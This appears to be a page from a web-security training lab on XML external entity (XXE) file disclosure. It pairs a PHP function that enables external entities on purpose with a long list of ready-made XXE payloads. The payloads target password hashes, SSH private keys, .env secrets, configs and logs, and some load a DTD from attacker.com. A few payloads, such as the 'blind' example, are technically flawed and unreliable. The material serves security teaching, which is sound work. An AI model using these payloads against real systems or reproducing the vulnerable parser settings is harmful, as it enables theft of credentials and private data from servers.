Lab 2: XXE with File Disclosure

XXE leading to file disclosure

Difficulty: Medium

Lab Overview

This lab demonstrates XXE vulnerabilities that lead to file disclosure. Attackers can use external entities to read sensitive files from the server, including configuration files, password files, and application source code.

Objective: Use XXE to read sensitive files from the server and demonstrate file disclosure vulnerabilities.

Vulnerable Code 
// Vulnerable: Direct XML processing without validation
function process_xxe_file_disclosure($xml_input) {
    // Vulnerable: Enable external entities (DEFAULT BEHAVIOR)
    libxml_disable_entity_loader(false);
    
    try {
        // Vulnerable: Direct XML parsing without validation
        $dom = new DOMDocument();
        $dom->loadXML($xml_input, LIBXML_NOENT | LIBXML_DTDLOAD);
        
        // Process XML data...
        return $data;
    } catch (Exception $e) {
        return "Error parsing XML: " . $e->getMessage();
    }
}
XXE File Disclosure Tester
⚠️ File Disclosure Warning

This lab demonstrates file disclosure via XXE. The following can be exploited:

  • file:///etc/passwd - User accounts
  • file:///etc/shadow - Password hashes
  • file:///etc/hosts - Host mappings
  • file:///proc/self/environ - Environment variables
File Disclosure Examples

Try these file disclosure payloads:

  • file:///etc/passwd - User accounts
  • file:///etc/shadow - Password hashes
  • file:///etc/hosts - Host mappings
  • file:///proc/self/environ - Environment variables
Parsed XML Data
Parsed Data (May contain sensitive file contents):
Array
(
)
Vulnerability Details
  • Type: XXE with File Disclosure
  • Severity: High
  • Method: POST
  • Issue: File disclosure via XXE
File Disclosure Types
  • System Files: /etc/passwd, /etc/shadow
  • Configuration Files: Apache, Nginx configs
  • Application Files: Source code, configs
  • Environment Data: Environment variables
XXE File Disclosure Payloads

Use these payloads to test file disclosure via XML External Entity Injection:

1. Basic File Disclosure Structure:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root><data>&xxe;</data></root>
2. Linux System Files:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root><data>&xxe;</data></root> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/shadow"> ]> <root><data>&xxe;</data></root> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/hosts"> ]> <root><data>&xxe;</data></root>
3. Windows System Files:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts"> ]> <root><data>&xxe;</data></root> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini"> ]> <root><data>&xxe;</data></root> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///C:/Windows/system.ini"> ]> <root><data>&xxe;</data></root>
4. Configuration Files:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/apache2/apache2.conf"> ]> <root><data>&xxe;</data></root> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/nginx/nginx.conf"> ]> <root><data>&xxe;</data></root> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/mysql/my.cnf"> ]> <root><data>&xxe;</data></root>
5. Application Files:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///var/www/html/index.php"> ]> <root><data>&xxe;</data></root> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///var/www/html/config.php"> ]> <root><data>&xxe;</data></root> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///var/www/html/.env"> ]> <root><data>&xxe;</data></root>
6. Environment and Process Files:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///proc/self/environ"> ]> <root><data>&xxe;</data></root> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///proc/version"> ]> <root><data>&xxe;</data></root> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///proc/cpuinfo"> ]> <root><data>&xxe;</data></root>
7. Log Files:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///var/log/apache2/access.log"> ]> <root><data>&xxe;</data></root> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///var/log/apache2/error.log"> ]> <root><data>&xxe;</data></root> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///var/log/auth.log"> ]> <root><data>&xxe;</data></root>
8. SSH and Key Files:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///home/user/.ssh/id_rsa"> ]> <root><data>&xxe;</data></root> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///home/user/.ssh/authorized_keys"> ]> <root><data>&xxe;</data></root> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///home/user/.ssh/known_hosts"> ]> <root><data>&xxe;</data></root>
9. Database Files:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///var/lib/mysql/mysql/user.MYD"> ]> <root><data>&xxe;</data></root> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///var/lib/mysql/mysql/db.MYD"> ]> <root><data>&xxe;</data></root>
10. PHP Wrapper for Base64 Encoding:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd"> ]> <root><data>&xxe;</data></root> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/shadow"> ]> <root><data>&xxe;</data></root>
11. PHP Wrapper for Different Encodings:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php"> ]> <root><data>&xxe;</data></root> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "php://filter/read=string.rot13/resource=index.php"> ]> <root><data>&xxe;</data></root>
12. Multiple Entity Declarations:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY file1 SYSTEM "file:///etc/passwd"> <!ENTITY file2 SYSTEM "file:///etc/hosts"> <!ENTITY file3 SYSTEM "file:///proc/version"> ]> <root> <passwd>&file1;</passwd> <hosts>&file2;</hosts> <version>&file3;</version> </root>
13. Parameter Entity Declarations:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY xxe SYSTEM "data://text/plain;base64,%file;"> ]> <root><data>&xxe;</data></root>
14. External DTD for File Disclosure:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root SYSTEM "http://attacker.com/evil.dtd"> <root><data>&xxe;</data></root> // evil.dtd content: <!ENTITY xxe SYSTEM "file:///etc/passwd">
15. Blind XXE for File Disclosure:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd"> %remote; ]> <root><data>&xxe;</data></root> // evil.dtd content: <!ENTITY xxe SYSTEM "file:///etc/passwd">
Real-World Attack Scenarios
Mitigation Strategies
  • Disable external entity processing in XML parsers
  • Use whitelist-based validation for allowed XML schemas
  • Implement proper input validation and sanitization
  • Use secure XML parsing libraries
  • Regular security testing and vulnerability assessments
  • Monitor for unusual XML processing patterns
  • Implement proper file system permissions
  • Use Web Application Firewall (WAF) to detect XXE attempts
  • Implement proper access controls for sensitive files